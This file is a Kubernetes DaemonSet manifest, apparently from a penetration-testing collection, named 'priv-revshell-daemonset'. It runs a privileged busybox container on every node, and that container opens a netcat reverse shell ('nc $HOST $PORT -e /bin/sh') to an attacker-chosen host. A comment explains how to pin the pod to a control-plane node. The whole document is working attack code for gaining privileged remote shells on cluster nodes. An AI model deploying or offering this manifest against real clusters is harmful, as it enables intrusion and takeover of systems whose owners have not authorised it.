apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: priv-revshell-daemonset
  labels:
    app: pentest
    type: daemonset
spec:
  selector:
    matchLabels:
      app: pentest
      type: daemonset
  template:
    metadata:
      labels:
        app: pentest
        type: daemonset
    spec:
      containers:
      - name: priv-revshell-daemonset
        image: busybox
        securityContext:
          privileged: true
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "nc $HOST $PORT  -e /bin/sh;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      